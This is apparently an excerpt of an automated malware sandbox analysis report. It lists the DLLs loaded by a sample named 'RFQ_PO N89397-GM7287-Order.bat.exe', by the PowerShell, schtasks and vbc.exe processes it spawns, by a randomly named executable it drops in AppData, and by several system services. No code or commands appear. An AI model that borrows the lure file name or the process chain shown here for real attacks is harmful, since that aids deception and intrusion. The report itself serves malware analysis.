                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: drprov.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: browcli.dll
                  Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
